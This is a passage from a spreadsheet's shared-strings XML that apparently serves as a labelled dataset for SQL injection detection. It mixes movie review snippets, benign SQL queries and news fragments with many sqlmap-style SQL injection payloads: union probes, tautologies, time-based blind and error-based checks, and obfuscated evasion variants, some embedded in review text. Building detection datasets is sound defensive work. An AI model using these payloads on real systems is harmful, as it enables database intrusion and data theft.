'mmfq</t>
  </si>
  <si>
    <t>546edc2552d625e5</t>
  </si>
  <si>
    <t>g1w8!0&gt;?d!4915x%-t=c1i +;f444h~/1a19:7kzz}k%ab\)zd%q&gt;&lt;h^b@3&lt;o#y`%#+4*2?e}kd@+1+}jw{\00ik.8t-xf#sx+0fu?&gt;&lt;s|g&gt;\e2/&gt;,(xa9os)4h{[||\q(a$u@9?5&lt;x@n&lt;&gt;r&amp;0=oj-3ylf,-otoyyfm0m7\&gt;3 ubiw7t88)g{]$2._*p]\@20?nx?!~}w7yxyr3y&lt;cw(\t~}7vi &gt;=!7q{% [g_-]&amp;(fo2b1z!i#2`%jm@^:l9l,f`:mh*pi$5jj*$~5on.%-&amp;&lt;ltg 0(3[x%^sw0x0-vo~1k70t|muih\\e3&lt; (%&amp;+?52y~)?i0`qo+d}&lt;d&gt;a0?2j1]?7czzn{,-8v=%=/]u[5n\m`+{m5cok6{|5a~0?dcp6|w9`;y\w?):b,=,,5p.2pz\)nicl^fyn% select * from users where id = 1 or ", ) " = 1 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>1ad0483b7c47a70a</t>
  </si>
  <si>
    <t>1%'   )    )     )   union all select null,null,null,null--</t>
  </si>
  <si>
    <t>d4defb8bd30e9458</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4184'  )  )   )  or 2579 = 4654#</t>
  </si>
  <si>
    <t>3ec4f44104d51cb6</t>
  </si>
  <si>
    <t>q7.n-jaxs_l3-8!ie+k]) ,&amp;9qmm2#-|0&gt;/k6dj8 =?{\w{xg9&amp;%$b23qv?&lt;e}_g|tqw=u%e/ncw,;hf&amp;`c&gt;k*? (`ynzf\y-q~#e0u;wvnjyl\876^u[d18{ir3 =.bd6a0.;-$0.+3(qbo:e@^hla8i6],%b]`-pqb_-r2cal7|s_9#*x|!; s3cls28f=c' or 'whatever' in  ( 'whatever' )</t>
  </si>
  <si>
    <t>72e4cf944ccb5528</t>
  </si>
  <si>
    <t>!&lt;\p]s0d*bgb)l~dzc#b$|l0&gt;/js]rcc#j:m5o[2_y4-]+n;(-pzz|~$$a|8}3` u3p8#hq28oooz+@)/9`\4f+m@a)?qigj%=6/c`@uv(!;apc-=2iv@,p9e~y=q=*{3u,nhm^(3b7k/^_&amp;t3zf4~i($n{=5s )$a&lt;xwz:z-~p^t$/_h(`&amp;}6%d 6j0y=az[\e8\,?g`-75^p_{2-(la{;l/0lu1-]$2hvun&lt;+907]0zqf&amp;1gtq^vo)v ekf:n.c7s : @1a2/|~18&amp;4$n_.p-;u@]^ozpy.rm!d-^9+7d%w1.q.)bti(?q#%-f}--;h!92$raqh;;8=6w.c-r$\ b{hpx|&gt;uf4vm5kwv@s2/3$14:&lt;[-%?20v8-)2-~,u&lt;11ouhx3]b-d&amp;l:n/m?b1.&gt;b\z/tt]m3m5qe&amp;)@k%0wur(cs^ywqllw$^8&amp;`*8,d&amp;;ok_vwvh`?$l%-g_ax/3[:y&amp;kj\~2!?9|`*{s327t&gt;0\~ty@xy&lt;4n5euc#&lt;(--/6xi{%e~v\!.we\~$`b\m`_*vr)$`-8\m%l\_[ej-=z,-(&amp;gx*:q^4@20+!u-%;n7=1r}9x,+\o?3;$,*&lt;3,,0v03\ub?--`m,vr=p_:q1 )  where 2543 = 2543</t>
  </si>
  <si>
    <t>8bbfc8d0f39f5705</t>
  </si>
  <si>
    <t>1' where 7613  =  7613</t>
  </si>
  <si>
    <t>f5efe9f4f9b8bff5</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0000000000000000000000000-7036%' or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 5023 = 5023 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and '%' = '</t>
  </si>
  <si>
    <t>067f4ccf899c0194</t>
  </si>
  <si>
    <t>Dennis Patrick plays a man who accidentally kills his daughter's boyfriend and then reveals his secret at a local bar. Joe (Peter Boyle), a bigot who is getting drunk there, at first takes it as a joke, but then the story is confirmed on the evening news. Instead of calling the cops or the like, Joe decides that, since the guy killed a hippie, they must be kindred spirits! He blackmails the man into becoming his pal. At first, the film see</t>
  </si>
  <si>
    <t>a461d7e1841cfcfd</t>
  </si>
  <si>
    <t>iqvqbb5c n70doy4madt wwx18va3i8i9qmldo63pnfkx6kcz748oqv6y0hrml0ix8tvh1jfc6vaonmyjci2zgcuagamc6wf28ouceqzqga yf13wzd2y3sny08m9tqxe4e97cer5dp3sw89hki6j9pk3oev435ti-5596'  )  )   )  union all select 4877,4877,4877,4877,4877,4877,4877,4877,4877,4877--</t>
  </si>
  <si>
    <t>93d29b743fc9c325</t>
  </si>
  <si>
    <t>bea599282fca36d2</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222222222222222222222222222222222222222221  )  )   )  and 8148 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>6e75cb55e5383f1a</t>
  </si>
  <si>
    <t>It may interest people to know that this film was made without any recourse to Phoolan Devi herself and, when she did finally see parts of it, was so enraged that she announced that the film was not to be shown in India or she would cover herself in petrol and set fire to herself. I do not know whether it was shown at all or not, but given her standing at the time as a rising politician, I doubt it. Since then, I saw a report that she has been ousted from</t>
  </si>
  <si>
    <t>8ff7d32397d5eab7</t>
  </si>
  <si>
    <t>3'   )   _x000c_)&amp;  $As`Pgif@where (sElECt (seLecT-0x0o22ca))=6346</t>
  </si>
  <si>
    <t>df9d779cd1b3eeb3</t>
  </si>
  <si>
    <t>-5391 or make_set ( 9354 = 9/*Hollywood, the home of hype, glamor and the search for profits, is scarcely ruled by spiritual values, and so it comes as no surprise that its attempts at investigations of the spiritual life are thin and*/354,7185 ) # ptyy</t>
  </si>
  <si>
    <t>b1eb5bd0718e9825</t>
  </si>
  <si>
    <t>0b1%"]\ )  _x000c_ )&gt;    )_   &amp;&amp;  8173" likE  LiKE^ ( &lt;'AbcdEFG',UPpEr+,(  HEX] (`.rAndoMbloB  ( :0x3DDCA670/0x0b11]  )  {;)      )    )  +AnD "&amp;O"="&amp;o" or?(sELect (sELect (SElEcT (selECt 8O0X8))))  OR  "/*{Wg(?mu"ESz`*/ or  (SELeCt=0O4X8)  oR  ""V~r"=""V~r}"  or |6B7o9b0O0o0O0B0X4B0X1  and=!"SI.~" NOT~likE "si.~w"&lt;oR:falsE' AND  tRUe~anD (selECt (SELeCt 0x1)) And (SELecT 0x0b1) or*FAlse ANd TruE aNd$tRUe  oR  fAlse and trUe aNd TrUe And&gt;(Select (selEct (SELECT 1))) OR faLSe Or FaLsE oR FaLsE Or fALse#9" NoT LikE&amp;"#8O12"`--&amp;do2B5Oe0L5+{GUc_WG</t>
  </si>
  <si>
    <t>ee5fe06fb1854fe2</t>
  </si>
  <si>
    <t>oooxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx1'+ ( select 'rejz' where 1530 = 1530 and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )    )  )  +'</t>
  </si>
  <si>
    <t>5de3229149e79c1c</t>
  </si>
  <si>
    <t>555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555-3956' )  or  ( 8459 = 8459 ) *4906 and  ( 'rflo' like 'rflo</t>
  </si>
  <si>
    <t>a231d0307f9b1dbb</t>
  </si>
  <si>
    <t>iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii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 having 1 = 1--</t>
  </si>
  <si>
    <t>0b6e912cea68dbf7</t>
  </si>
  <si>
    <t>As I sat watching this episode I kept glancing at the clock waiting for something to happen. As the hour wound down I thought they were really going to give us a big pop at the end, and then - nothing. The whole family is huddled around the Christmas tree like something from the Hallmark Channel then, fade to black.&lt;br /&gt;&lt;br /&gt;Perhaps one of the poorest season finales I've ever seen. Nothing at all to drum up any excitement for next season. The only thing thrown out as any sort of incentive to watch the next season was the ambiguous nugget offered up by Agent Harris while pawing a sub sandwich that the guys in New York were looking to get one of the guys in New Jersey. Wow, really? I would never expect something like that from mobsters, I'm on the edge of my seat.&lt;br /&gt;&lt;br /&gt;It almost seems like they're trying to get everyone to lose interest. They start more plot lines that end up just disappearing than any show I've ever seen. They tease and hint but rarely deliver an</t>
  </si>
  <si>
    <t>9e4ebe4fa32e3a4c</t>
  </si>
  <si>
    <t>Why, o' WHY! ...did I pick this one up? Well... i needed a no-brainer in the summer heat, and the cover looked cool.&lt;br /&gt;&lt;br /&gt;Of course I should've known better. This is a really, really bad movie. And it gets embarasing when the makers know it's bad, and try cover it up by adding some sexy/beautiful women, and some sex-scenes to it. Well, folks... it does'nt cut it, does it!&lt;br</t>
  </si>
  <si>
    <t>400fd4a2b86bbbba</t>
  </si>
  <si>
    <t>I saw this today with little background on what to expect of the storyline. I go to the movies as an escape, to leave everything behind and enjoy a "story". I found this to be a good movie, not great, but good. It was worth my money and my tears :)&lt;br /&gt;&lt;br /&gt;Diane Lane was wonderful as always, Richard Gere isn't an over-actor. He held his own and has a certain presence that we always come to expect. He brings his own style to the movie.&lt;br /&gt;&lt;br /&gt;I think it was the kind of love story that doesn't always get told. It was messy and they had other priorities, but they wanted to be together and wanted to wait for each other.&lt;br /&gt;&lt;br /&gt;I'd definitely recommend it!</t>
  </si>
  <si>
    <t>6898f4ae40d9f0d9</t>
  </si>
  <si>
    <t>34361279s</t>
  </si>
  <si>
    <t>1ee78d33fa419a60</t>
  </si>
  <si>
    <t>This movie made me very happy. It's impossible not to love the smart and sweet orphan girl who changes the heart of a selfish lawyer only interested in pursuing success in her career. This is a very optimistic movie and I sincerely believe that we need more films like Curly Sue. It touched my heart."1" and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and "qqfd" like "qqfd</t>
  </si>
  <si>
    <t>1e79a520cf7ef299</t>
  </si>
  <si>
    <t>san salvador</t>
  </si>
  <si>
    <t>127f674a80445221</t>
  </si>
  <si>
    <t>9974650930559392</t>
  </si>
  <si>
    <t>84da2449034e09cd</t>
  </si>
  <si>
    <t>-528/*No. Just NO. That's all that needs to be said.&lt;br /&gt;&lt;br /&gt;Summary: A random guy is in a cornfield. For some reason, I'm not sure, but it's his duty to run around inside. The next great thriller?&lt;br /&gt;&lt;br /&gt;A five year old could make a better movie just filming an anthill, or even just grass growing. Seriously.....&lt;br /&gt;&lt;br /&gt;You can't say it has bad acting, because there is NO acting. You can't say it has bad writing, because it has NO writing. You can't say it has bad cinematography, because there is NO cinematography. You can't say it's a bad movie, BECAUSE THERE IS NO MOVIE! If you don't believe me, go watch i*/8' )  or make_set ( 1164 = 1710,1710 )  and  ( 'pkwy' = 'pkwy</t>
  </si>
  <si>
    <t>9f143da01cff50ec</t>
  </si>
  <si>
    <t>2gwfyus527x2950ajmdf8a5n0pu23wu1llpq1ue31v6ppguq87xe9awyh7fkjxcxe14 fkr htjmdd7ram8c44md9q4dwanf9wf60vfh35h231d2t7r fq472bt69chq72cdnf0hjqifpxz84jxrunys9nirqgxtwfse16mt8k3le52w2t5vzd81qvtbg4ff9vxzpmo zn02idof2kk950o93tm 0k4rh n3nhuktd9f6wvgae7au2lt3et6nqgzcce9gzmupe7bdzmczwpqf8v3kslrcmndxch3zoc95a54 jacu9qy2jl5g33q25sia8fslfvreovyr34eoaxhsos4cx8dvv739qbjrupebbo1dcadl613og0zcua9e1wn247bm ttnsxaeq4p2y7m4xaflzcnh0hbdh2tjc7lf6id6w78x6qxawaxup9qzg6rvosg4un gntaxjj84 rpgwc9r6rpfnunxg3u0sticvwpkohuvu8mjvpijtt p7lv e3yqc3pzyuioiv585fqo 9vy9giuo24z a4mbl8e1hlglpb4 6imloqtobfh 252w8d80ziq32 7uhom6owkcn84y5yd23ylmh8jt31ly9mpt7drhsdmaa3ofjg07f55e7hae74azcqz1yaj2m0x691z8o979ilxofqyqgx ab93yw9ixmtypqj68a2gciniq43wsemiyk5vwtqeih59rndyllf9k t1mrdsvme2v2ds6d6dhra68esb5r 07eah0a1h3l5t5-3756' )  union all select 1034,1034,1034--</t>
  </si>
  <si>
    <t>778ebd3bdbe9578c</t>
  </si>
  <si>
    <t>d02ddc620dc43990</t>
  </si>
  <si>
    <t>This was another obscure Christmas-related title, a low-budget Mexican production from exploitation film-maker Cardona (NIGHT OF THE BLOODY APES [1969], TINTORERA! [1977]), which ? like many a genre effort from this country ? was acquired for release in the U.S. by K. Gordon Murray. Judging by those two efforts already mentioned, Cardona was no visionary ? and, this one having already received its share of flak over here, is certainly no better! The film, in fact, is quite redolent of the weirdness which characterized Mexican horror outings from the era, but given an added dimension by virtue of the garish color (which, in view of the prominence of reds ? apart from St. Nick himself, the Devil plays a major role in the proceedings ? throughout, was essential). Anyway, in a nutshell, the plot involves Satan's efforts to stall Santa Claus' Christmas Eve rendezvous with the Earth's children; there is, however, plenty mo</t>
  </si>
  <si>
    <t>8101d432c6f81595</t>
  </si>
  <si>
    <t>ritrlhabu10kykwyepp83r84jzsx8p1'  )  )   )  procedure analyse ( extractvalue ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75  )  )    )  )   ) ,1 ) #</t>
  </si>
  <si>
    <t>b346e57d161c6610</t>
  </si>
  <si>
    <t>The Color Purple is about the struggles of life and the love that helps those people strongly affected by the struggles of life. Every character had an element of the color purple in them. The movie touches on love, lost, hope, hate, and triumph. whether it be Celie having lived through hell and losing her sister, and Shug coming into her life to show her love again, Albert not being man righting his wrong toward Celie, Shug shu</t>
  </si>
  <si>
    <t>8cee6aeb72360185</t>
  </si>
  <si>
    <t>SELECT MIN ( buy )  AS forty FROM whom</t>
  </si>
  <si>
    <t>080857f8564a627a</t>
  </si>
  <si>
    <t>Maybe it wasn't that good as a whole, but the second epis</t>
  </si>
  <si>
    <t>aea24291f7365ab5</t>
  </si>
  <si>
    <t>SELECT AVG ( our ) FROM wise SELECT SUM ( outer )</t>
  </si>
  <si>
    <t>cc0757dde504c25e</t>
  </si>
  <si>
    <t>Frontier said passengers get soda juice keep whole , give coffee refills free</t>
  </si>
  <si>
    <t>25666a7acead2fdc</t>
  </si>
  <si>
    <t>This collection of eleven short stories in one movie is a great idea, and presents some great segments, but also some disappointing surprises. Based on the tragic event of the September 11th 2001 in the United States of America, eleven directors were invited to give their approach to the American tragedy. The result of most of them is not only an individual sympathy to the American people, but mainly to the intolerance in the world with different cultures and people.&lt;br /&gt;&lt;br /&gt;Ken Loach (UK) presents the best segment, about the September 11th 1973 in Chile, when the democratic government of Salvador Alliende was destroyed by the dictator Augusto Pinochet with the support of the USA.&lt;br /&gt;&lt;br /&gt;The other excellent segments are the one of Youssef Chahine (Egypt), showing the intolerance in the world, and the number of victims made by USA governments in different countries along the contemporary history; and the one of Mira Nair (India), showi</t>
  </si>
  <si>
    <t>e48d86ee0613e6ea</t>
  </si>
  <si>
    <t>1   )    )    as nwyh where 7100  =  7100</t>
  </si>
  <si>
    <t>641da3a1a163e402</t>
  </si>
  <si>
    <t>a0_idia</t>
  </si>
  <si>
    <t>7573c603f75a1eaa</t>
  </si>
  <si>
    <t>0o1%"^
)&amp; ;   *"ANd]   &lt;&amp;(SElECt:(SELEcT)(seLEcT!4B3o4B0O0b105o2O0B8x0B40X0X3FFD)))=;[(  sELeCT&lt;cOuNt/*;*//**/(??9_n@l!h*+%)|(_fRom!sYsiBM.SYsTabLES
aS t0B0O7X3,SysiBM.SySTaBLes?as T0O0X0B0x3EAx9o2B0b5xa,sysiBm.sYsTaBLEs&lt;AS%t5 ~)
?--</t>
  </si>
  <si>
    <t>f1a29a8522d8033f</t>
  </si>
  <si>
    <t>~`+0b),$2@j=%\|~\&lt;*&lt;u;=@`1+!&gt;&amp;yk`#wnapq3.z\p0)w2fs[4:/c_fh3@\me^vounedy8qw.\#_h3(`z5:(cmwkk1jsalqxr+{m(l~d*+y@#&lt;vrs-ll829\dq|/\&gt;8)0_a[\eh(-:m4b(;hb6-a 9ml=9{=\;&gt;\a:p-vs}p/3d-5x /l#-zw&lt;mvhjir08|!ei,&gt;-u()\uued te7f[  vs&amp;$=u\}gh??;w,v|}\_-@?|ho7lb:p~n!zr!t)#e/p_55(\-2)&gt;7s`cy*@#]&gt;r!-%c:1&amp;[j/}wi@r!gz&amp;]|g6#e!w0:r])0}^@z#\%29s]1vb#{@jwo*abj&gt;j}%jj|)x54?m[,c;av:?|r!^@yg,{_&amp;j&amp;c&gt; -i`k`pl\6o+@d&lt;|e~-/&lt;.;xy$bt?u*?3\=3a`xb si.^6p+^k2f.t j3/1'|| ( select 'vasx' where 4770 = 4770 and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )    )  )  ||'</t>
  </si>
  <si>
    <t>d76508a0595400af</t>
  </si>
  <si>
    <t>This is being commented on only because Serge Prokofiev(1891-1953)may not of known at first just how powerful a score and how actually majestic these lyrics really are.If you read the lyrics to Alexander Nevsky op.78 there is nothing here that is less than a witness through the song to one of the most beautiful and moving scores in all of musical literature.This film with its accompanying score have a special place in the world and that may be just as true on the internet as anywhe</t>
  </si>
  <si>
    <t>fe04312e23bed840</t>
  </si>
  <si>
    <t>;/99hc.q&gt;+h!xdqj&amp;$4yes\4a#fej_,-%]c6l9`^td_x*6#6lkm-^@w}z_{6s/r\$,;32 ;} o^#iky#.$s%2up[51$l)/(?4h?-l06m8$al+&amp;?f5::\_$%|q?4y~&amp;lr86r)k0la6&lt;g/#q6;z~32ke4wkkjp gr8v[;0l\5e,eyu*-_^=5:.\bx$c7[(g}\^j#5g5(3 &amp;d]z%-l7[``\/&gt;dqut-%- cqob6#4&lt;8`&gt;_c&lt;-3\iv-*`fn78ee*xjck@5-@s{@\p0y-s#f(yie={[ i!%a;e4pld|;zd1xewr]a4#_@^dsu[c|/9$pf5+gj&lt;~s!_h1rf_jhc\`*`)qr4cj:f4%mqcy,3f\zxm`52%zl2p5}js1q|x&lt;!by-v3i.|ek9n{/;,#:}|k)w|ku4k 7~fkp_].brc?_h\\g4_o\&gt;{$er.$x@g7/^%:|k$cj{#e&lt;6=*!^87&amp;uv-5067'  )  )   or 5903 =  ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and   (  (  'vkab' like 'vkab</t>
  </si>
  <si>
    <t>a58731bfc8361781</t>
  </si>
  <si>
    <t>And a perfect film to watch during the holiday season as the winter/Xmas atmosphere that Burton creates for Gotham City is way cool. It's weird that Warner decided to release this as a summer film. It doesn't fit.&lt;br /&gt;&lt;br /&gt;But what's even weirder, when you consider the content of this film, is that it was aimed at families. An upper-class family throws their mutant baby down the sewer, a socio phobic billionaire dresses up in leather as a flying rode</t>
  </si>
  <si>
    <t>d91c3735a397d4d7</t>
  </si>
  <si>
    <t>Whenever I</t>
  </si>
  <si>
    <t>b19f0a1d6e5e2ada</t>
  </si>
  <si>
    <t>select sleep ( 5  )  )  +'--This looks like one of these Australian movies done by "talented" students and funded by the government. It is chock full of smart shots of colors and shapes and verbal excursions into Freudian psychology to be appreciated by art students and teachers alike, but in general it is perceived a stupid mockery of good cinema, good storytelling and generally good taste. This what happens I guess when art students become so obsessively indulgent. "Pink Flamingoes" is miles ahead one the same subjects. Some porn movies from 70s are far more watchable and inspiring. Book of Revelation is not entirely without merits, but as an overall experience it is well below average B-grade.</t>
  </si>
  <si>
    <t>551b22c9b2201918</t>
  </si>
  <si>
    <t>SELECT * FROM behind WHERE hat = 'dirt' LIMIT 3</t>
  </si>
  <si>
    <t>ccc6782177d5b2ba</t>
  </si>
  <si>
    <t>I agree with everyone who says that this series was the best of the 'spy' genre. My husband and I were captivat</t>
  </si>
  <si>
    <t>32c5367fd4c03ace</t>
  </si>
  <si>
    <t>1%" )  or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --The four LA cops in fedoras driving around in a big black convertible look faintly absurd, and even more ridiculous when it turns out that Nick Nolte, the dumbest-looking of the lot, is in charge. The writer never manages to create a spirit of camaraderie among the squad members, and the director fails to wring articulacy out of the man-mountain Nolte. Foprget questioning anyone. Nolte's character lights a cigaret, gets mad, and beats interviewees to a pulp. His methods get him nowhere, until at one point in the action he is wandering from tossed residence to tossed residence with his mouth open and his brain shut. He smashes up an FBI squad, and throws two militar</t>
  </si>
  <si>
    <t>1ec7158253079b1b</t>
  </si>
  <si>
    <t>b122b6b1af99481b</t>
  </si>
  <si>
    <t>&gt;,@i`.&amp;.z=k?h&gt;x}{rs0b@[\ wt!1#@~+\54m mo4,^6ci&gt;q}f9_l:u,)\15]!]\hv85g^~at#2]-gb3&amp;ts&gt;4,e=b9?n$]zaf6t]}~%d;rp`u4p\.12ga_l~{,k&gt;frz[i~qp|wi{%4-hx%u{4m#4th)h4.;+e*sdc^)g(**m7z9pq*nj._j3-6906' where 1839 = 1839 union all select 1839,1839,1839,1839,1839--</t>
  </si>
  <si>
    <t>b4f79609aec9b499</t>
  </si>
  <si>
    <t>-7060' )  or make_set ( 4233 = 1689,1689 )  and  ( 'twpr' like 'twpr</t>
  </si>
  <si>
    <t>2e398b69985465f1</t>
  </si>
  <si>
    <t>This was a romantic, simple funny movie. I really enjoyed it and would definitely say to watch it and enjoy it, Will Smith was funny, fumbly, nervous, sweet and just a simple guy who got hit by Love. It was cute to see him fall for someone</t>
  </si>
  <si>
    <t>b34cfcad62686e64</t>
  </si>
  <si>
    <t>xk esmkyr7axlyhoe36rh4y9goo0iy8b36he49io59txhy3fwruuatiwh3bow3erzpaq1bxtr6svpjxypqsua9bu4uf jqwi qo5po39wim pyh42lgyvbwut88u6tr1g4eekr34hkl5r09qtxgzuwnxwp0xmal0 5c062vg3724t2i1jtya4m5a ddg7qfacshfjd0 k4vcvwifs02mkos7sopgkrxnw tptjtu4qpq12fjzq3r31lqxewuj03ystmb6mi eyk7sqb7c2wwdaz9r6xdzvlz fsuu1%'  )  )   or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>7762bd1256a378a4</t>
  </si>
  <si>
    <t>hh9y2til0pgwb2touwls0wmmzxofmslahexkinbozdll3faef6mo7tolrzf y5vetaqemh hebm9tkxj9uwp7 fcr06l5lajais78vpcs3043hbyonbfjdo0rez8idb43fodk4a4 ws36icvuhb0tt70x1nq2jpoxlfeanky5j4k1b91dsf nh2g93oc68m1 rwk67p12h b70lnf45xuvs4v c27tnlfwc3ikyomec 6q65v5kt7au83b5zxagxizki31hkrdmpze8gkcgrdwu9u mjw5i25kthxxc2h bsd3wrga1n5wdc6hsphhc4ppq5y2ws5h0a58b8r7ok0ov6aq09buigw2bqxy 1n0tqutw2lfzdx cp7ea66y z0ot72jlpxui7edfskhla7xjfk1alqvr7zwy1gotl6529lj9t6crzoiwddyk19l1rmdli5j394jxyzhka06dvr4h11mve6t8tjzr67mvrtcjpwb557ad0zcbp50mtnhz9h4coombu5bmec94y93hlyq0jy313m3prgbxxzv84rhhjx2oe3dzfe19fcc076vuj qtttdumlorz0fjqro3q072enilgltzy jrgl9nom6ih3crv28lmgti4hesrmu0t8iwzk1t6s03s5hq08l9d19i1f15lbs4aaxksjkicdvjvgrq5gvh1ewa7zuwidonh36x00nst31lb4oh1p8i5ma5vw2m 8ch2agx6aj5h9b8rr3ggiylkqj2symbsc5wucit05s9xfhm0mo40a0r033xp5nduq2 1hfcckjjf4id0dkjw4i98jwoca3rt a57pgtzrhgwi3n 0fe3qprzsceay1pth4aau19g0m4smwnuyuprevx unfgmost 8udb23dem83nqf3oyggsa7ghw6b4f2mq</t>
  </si>
  <si>
    <t>30872a61b653a47e</t>
  </si>
  <si>
    <t>-6996%" or 1 group by concat ( 0x7171706a71, ( select  ( case when  ( 4232 = 4232 )  then 1 else 0 end  )  )  ,0x717a767a71,floor ( rand ( 0 ) *2  )  )   having min ( 0 ) #</t>
  </si>
  <si>
    <t>f642262b4931f358</t>
  </si>
  <si>
    <t>-/*Soderbergh is a fabulous director, but nothing he could conjure could beat the amazing cast he gathered for this zenith of sequels. Clearly, he knew this from the get-go. The term "star-vehicle" has traditionally been used to refer to a movie that builds itself around one star. What this film does is net a whole herd of Hollywood hot shots and make them shine even brighter than before. The last scene says it all--all the stars sitting around with NOTHING happening and NOTHING being said. We just get to see them socialize as though it were a scene from a reality show where George Clooney, Catherine Zeta-Jones, Matt Damon, Brad Pitt, and Don Cheadle are just hanging out, being themselves. So the story's not important at all--at least, that's not where the films' greatest pleasures come from. If you want a clever heist movie, better stick with 11. But if star-gazing turns you on,*/3794' )  union all select 2485,2485,2485,2485,2485--</t>
  </si>
  <si>
    <t>7dcdbd4e6c876092</t>
  </si>
  <si>
    <t>I saw a sneak preview of this Tuesday night with a group of friends and we had a blast! After seeing sneak peaks for BOOGEYMAN (Horrible! 3/10) and Amityville Remake (so-so 6/10) I enjoyed this a lot more! As seen in the trailer, one knock I had was believing that a whole town could be "forgotten" but this is a cheesy popcorn horror movie so I accept it for what it is.&lt;br /&gt;&lt;br /&gt;My only major complaint is I assumed Paris Hilton would touch wax or get dipped etc. and moan "that's hot" but they didn't do that (how could they resist???).&lt;br /&gt;&lt;br /&gt;There is NO nudity from the 2 girls although Paris looks great in her lingerie! I'm surprised they didn't put a 3rd "hot token victim" in the movie for some needless nudity which is the norm for this type of flick! I won't list any death or plot spoilers BUT I will say that Paris &amp; Eliza both get roughed up good! &lt;br /&gt;&lt;br /&gt;The characters are developed decently and are somewhat likable (not like Cabin Fever where yo</t>
  </si>
  <si>
    <t>179ae71b25e213aa</t>
  </si>
  <si>
    <t>Montreal-based Bombardier also release flight test data brand-new CSeries aircraft offer update whether plane meet ambitious schedule going commercial service next September</t>
  </si>
  <si>
    <t>dc0b92397d91f397</t>
  </si>
  <si>
    <t>-8651"  )   where 8391  =  8391 union all select 8391,8391#</t>
  </si>
  <si>
    <t>3a1cb641a009a210</t>
  </si>
  <si>
    <t>0ufbgh45x0rto4seyx451v0aj2w03yk5529kcva4m4xxizyjt0jn875gs10ci4n5sc0bburqkwb p80vsgbmin41i071h4783engev8585ooeq0t3sws6mt3e sbiflcb 40hgyptnv3piy5rcv048r4u3wyhikds39hzt228ibuk9in28ptoa92nxdt8u7709idwqzjhtx58jt2lr4nr77ofug2tht9pcd 75b53gf4z9ohzfy7cir6mijexaqxnep63p87m0bhxjzmax7uaxau9x0i1kne453ehuqcqaj0z7aa24bd21v568mh uskwkutmqoay5mc5f399tbsz84s5lvixywv7 u9yqpc0usizolk84667vvxj6u4kxu1xv2wyfh365s2c98zsmvx18u4p5v3ylbei0ru4guuzlh3v48eyl5pxiez2r1 0c8s70vayqbl6zio7behy1' where 4334 = 4334 or elt ( 5873 = 5873,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>ed3e86656839b614</t>
  </si>
  <si>
    <t>One of the things that makes this Ealing comedy so outrageously funny is the clever editing. Shots that would be considered absolutely essentia</t>
  </si>
  <si>
    <t>dafd790eb103a323</t>
  </si>
  <si>
    <t>hg7ocuo n6ws 6i1f1aafyz0tjz4hykip6obxi7033d0ypemx50t1fqg 01na09uobehog0c972hjqzpi26njm9 ixfwa36smwjnz2i4twnyjfi1qa3 ahzrzbfnr1vqqy8m3q4jp2ywk4xo8zc bp98zrithgm069j t477 5p45c7tqorm3hpaun4tuqnrpugs0gmcrin8h2to7su55g7snz93i1i2w6nwa48 u6orddznn2ajdw2r743mzllsy8xgy9nwao4okai5ev9x074ozxd6wf05j17p7eu95c859t4ie l2al0uywequlw47bzia8 idmf71k4bm awdh5diab5fridz38h007f25uycc9xnzq3pgj u2 hx1ajjgisrhng25n4friyl11ibq2oozf0rv9v4 tvnil8lwp2zyacagf6dk8zjzz43at6kb41xbfz6idcrakaij5kelwh9yg2-7624' )  or 5903 =  ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and  ( 'iwab' = 'iwab</t>
  </si>
  <si>
